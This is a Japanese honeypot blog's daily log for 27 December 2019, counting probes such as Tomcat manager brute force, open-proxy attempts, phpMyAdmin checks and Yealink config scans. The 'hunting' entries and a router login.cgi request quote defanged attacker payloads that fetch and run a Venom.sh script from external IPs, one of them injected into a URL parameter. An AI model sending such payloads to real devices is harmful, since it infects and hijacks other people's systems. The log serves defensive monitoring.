23log

WOWHoneypotで観測した日々のログをつらつらと

トップ > Honeypot > WOWHoneypot観察(286日目)

WOWHoneypot観察(286日目)

Honeypot

2019/12/27(金)

トータルは198件でした。

ハンティングログは以下です。

197.33.201[.]44 wget hxxp[:]//185.132.53[.]119/Venom.sh

www.virustotal.com
www.virustotal.com

186.251.249[.]239 wget${IFS}-qO-${IFS}hxxp[:]//104.244.75[.]222/b

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
116 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
32 アクセス GET /
3 不正中継の試み CONNECT www.sogou.com:443
2 GET /Telerik.Web.UI.WebResource.axd?type=rau
1 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
1 不正中継の調査 GET hxxp[:]//www.ceek.jp/?0.80706506587397491405804
1 不正中継の調査 GET hxxp[:]//www.123cha.com/
1 不正中継の調査 GET hxxp[:]//mail.21cn.com/?0.3482348302435040470080
1 Yealink製品のcfgファイルの調査 GET /yealink/y000000000076.cfg
1 Yealink製品のcfgファイルの調査 GET /yealink/y000000000069.cfg
1 Yealink製品のcfgファイルの調査 GET /yealink/y000000000068.cfg
1 Yealink製品のcfgファイルの調査 GET /yealink/y000000000067.cfg
1 Yealink製品のcfgファイルの調査 GET /yealink/y000000000066.cfg
1 Yealink製品のcfgファイルの調査 GET /yealink/y000000000054.cfg
1 Yealink製品のcfgファイルの調査 GET /yealink/y000000000046.cfg
1 Yealink製品のcfgファイルの調査 GET /yealink/y000000000045.cfg
1 Yealink製品のcfgファイルの調査 GET /yealink/y000000000038.cfg
1 Yealink製品のcfgファイルの調査 GET /yealink/y000000000035.cfg
1 Yealink製品のcfgファイルの調査 GET /yealink/y000000000034.cfg
1 不明 GET /templets/lurd//lurd-add.htm
1 cfgファイルの調査 GET /provisioning/y000000000076.cfg
1 cfgファイルの調査 GET /provisioning/y000000000068.cfg
1 cfgファイルの調査 GET /provisioning/y000000000067.cfg
1 cfgファイルの調査 GET /provisioning/y000000000066.cfg
1 cfgファイルの調査 GET /provisioning/y000000000053.cfg
1 cfgファイルの調査 GET /provisioning/y000000000052.cfg
1 cfgファイルの調査 GET /provisioning/y000000000046.cfg
1 cfgファイルの調査 GET /provisioning/y000000000045.cfg
1 cfgファイルの調査 GET /provisioning/y000000000044.cfg
1 cfgファイルの調査 GET /provisioning/y000000000038.cfg
1 cfgファイルの調査 GET /provisioning/y000000000036.cfg
1 cfgファイルの調査 GET /provisioning/y000000000035.cfg
1 cfgファイルの調査 GET /provisioning/y000000000034.cfg
1 cfgファイルの調査 GET /provisioning/y000000000032.cfg
1 cfgファイルの調査 GET /provisioning/y000000000031.cfg
1 cfgファイルの調査 GET /provisioning/y000000000029.cfg
1 cfgファイルの調査 GET /provisioning/y000000000028.cfg
1 cfgファイルの調査 GET /provisioning/y000000000025.cfg
1 cfgファイルの調査 GET /provisioning/y000000000023.cfg
1 cfgファイルの調査 GET /provisioning/y000000000007.cfg
1 cfgファイルの調査 GET /provisioning/y000000000005.cfg
1 cfgファイルの調査 GET /provisioning/y000000000004.cfg
1 cfgファイルの調査 GET /provisioning/y000000000000.cfg
1 phpMyAdminの調査 GET /phpmyadmin/
1 ルーター脆弱性を狙った通信 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp[:]//185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$
1 phpMyAdminの調査 GET /admin/config.php
1 不正中継の試み不正中継の試み CONNECT www.ipip.net:443
1 不正中継の試み CONNECT cn.bing.com:443